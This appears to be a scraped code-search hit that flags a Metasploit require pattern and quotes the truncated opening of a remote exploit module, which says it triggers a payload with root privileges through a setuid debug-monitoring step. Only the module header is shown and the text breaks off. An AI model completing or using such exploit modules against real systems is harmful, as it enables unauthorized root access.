Detected 1 occurrence(s) of ‘require [\'\"]msf/core[\'\"]‘: setuid, to turn the debug monitoring on. This makes it possible to trigger our payload with root privileges. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'net/ssh' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Array […]
↧